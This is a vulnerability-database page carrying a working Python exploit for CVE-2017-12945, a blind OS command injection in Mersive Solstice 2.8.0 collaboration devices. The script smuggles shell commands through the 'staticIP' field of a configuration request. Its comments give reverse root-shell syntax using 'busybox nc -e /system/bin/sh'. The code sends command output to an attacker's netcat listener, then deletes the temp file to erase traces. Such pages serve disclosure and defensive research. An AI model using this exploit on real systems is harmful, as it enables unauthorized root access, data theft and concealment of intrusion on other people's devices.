Vulners
Lucene search
Mersive Solstice 2.8.0 Remote Code Execution
🗓️ 28 Nov 2019 00:00:00Reported by Alexandre TeyarType 
packetstorm🔗 packetstormsecurity.com👁 228 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Mersive Solstice 2.8.0 - Remote Code Execution Exploit | 29 Nov 201900:00 | – | zdt |
 | CVE-2017-12945 | 28 Feb 202417:47 | – | circl |
 | CVE-2017-12945 | 27 Nov 201915:54 | – | cve |
 | CVE-2017-12945 | 27 Nov 201915:54 | – | cvelist |
 | Mersive Solstice 2.8.0 - Remote Code Execution | 28 Nov 201900:00 | – | exploitdb |
 | Mersive Solstice 2.8.0 - Remote Code Execution | 28 Nov 201900:00 | – | exploitpack |
 | CVE-2017-12945 | 27 Nov 201916:15 | – | nvd |
 | CVE-2017-12945 | 27 Nov 201916:15 | – | osv |
 | Input validation | 27 Nov 201916:15 | – | prion |
 | CVE-2017-12945 | 22 May 202505:43 | – | redhatcve |
10
`# Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2016-12-23
# Exploit Author: Alexandre Teyar
# Vendor Homepage: https://www2.mersive.com/
# Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk
# Versions: 2.8.0
# Tested On: Mersive Solstice 2.8.0
# CVE: CVE-2017-12945
# Description : This will exploit an (authenticated) blind OS command injection
# vulnerability present in Solstice devices running versions
# of the firmware prior to 2.8.4.
# Notes : To get the the command output (in piped-mode), a netcat listener
# (e.g. 'nc -lkvp <LPORT>') needs to be launched before
# running the exploit.
# To get an interactive root shell use the following syntax
# 'python.exe .\CVE-2017-12945.py -pass <PASSWORD>
# -rh <RHOST> -p "busybox nc <LHOST> <LPORT>
# -e /system/bin/sh -i"'.
#!/usr/bin/env python3
import argparse
import logging
import requests
import sys
import time
def parse_args():
""" Parse and validate the command line supplied by users
"""
parser = argparse.ArgumentParser(
description="Solstice Pod Blind Command Injection"
)
parser.add_argument(
"-d",
"--debug",
dest="loglevel",
help="enable verbose debug mode",
required=False,
action="store_const",
const=logging.DEBUG,
default=logging.INFO
)
parser.add_argument(
"-lh",
"--lhost",
dest="lhost",
help="the listening address",
required=False,
type=str
)
parser.add_argument(
"-lp",
"--lport",
dest="lport",
help="the listening port - default 4444",
required=False,
default="4444",
type=str
)
parser.add_argument(
"-p",
"--payload",
dest="payload",
help="the command to execute",
required=True,
type=str
)
parser.add_argument(
"-pass",
"--password",
dest="password",
help="the target administrator password",
required=False,
default="",
type=str
)
parser.add_argument(
"-rh",
"--rhost",
dest="rhost",
help="the target address",
required=True,
type=str
)
return parser.parse_args()
def main():
try:
args = parse_args()
lhost = args.lhost
lport = args.lport
password = args.password
rhost = args.rhost
logging.basicConfig(
datefmt="%H:%M:%S",
format="%(asctime)s: %(levelname)-8s %(message)s",
handlers=[logging.StreamHandler()],
level=args.loglevel
)
# Redirect stdout and stderr to <FILE>
# only when the exploit is launched in piped mode
if lhost and lport:
payload = args.payload + " > /data/local/tmp/rce.tmp 2>&1"
logging.info(
"attacker listening address: {}:{}".format(lhost, lport)
)
else:
payload = args.payload
logging.info("solstice pod address: {}".format(rhost))
if password:
logging.info(
"solstice pod administrator password: {}".format(password)
)
# Send the payload to be executed
logging.info("sending the payload...")
send_payload(rhost, password, payload)
# Send the results of the payload execution to the attacker
# using 'nc <LHOST> <LPORT> < <FILE>' then remove <FILE>
if lhost and lport:
payload = (
"busybox nc {} {} < /data/local/tmp/rce.tmp ".format(
lhost, lport
)
)
logging.info("retrieving the results...")
send_payload(rhost, password, payload)
# Erase exploitation traces
payload = "rm -f /data/local/tmp/rce.tmp"
logging.info("erasing exploitation traces...")
send_payload(rhost, password, payload)
except KeyboardInterrupt:
logging.warning("'CTRL+C' pressed, exiting...")
sys.exit(0)
def send_payload(rhost, password, payload):
URL = "http://{}/Config/service/saveData".format(rhost)
headers = {
"Content-Type": "application/json",
"X-Requested-With": "XMLHttpRequest",
"Referer": "http://{}/Config/config.html".format(rhost)
}
data = {
"m_networkCuration":
{
"ethernet":
{
"dhcp": False,
"staticIP": "; {}".format(payload),
"gateway": "",
"prefixLength": 24,
"dns1": "",
"dns2": ""
}
},
"password": "{}".format(password)
}
# Debugging using the BurpSuite
# proxies = {
# 'http': 'http://127.0.0.1:8080',
# 'https': 'https://127.0.0.1:8080'
# }
try:
logging.info("{}".format(payload))
response = requests.post(
URL,
headers=headers,
# proxies=proxies,
json=data
)
logging.debug(
"{}".format(response.json())
)
# Wait for the command to be executed
time.sleep(2)
except requests.exceptions.RequestException as ex:
logging.error("{}".format(ex))
sys.exit(0)
if __name__ == "__main__":
main()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Nov 2019 00:00Current
8.9High risk
Vulners AI Score8.9
EPSS0.25432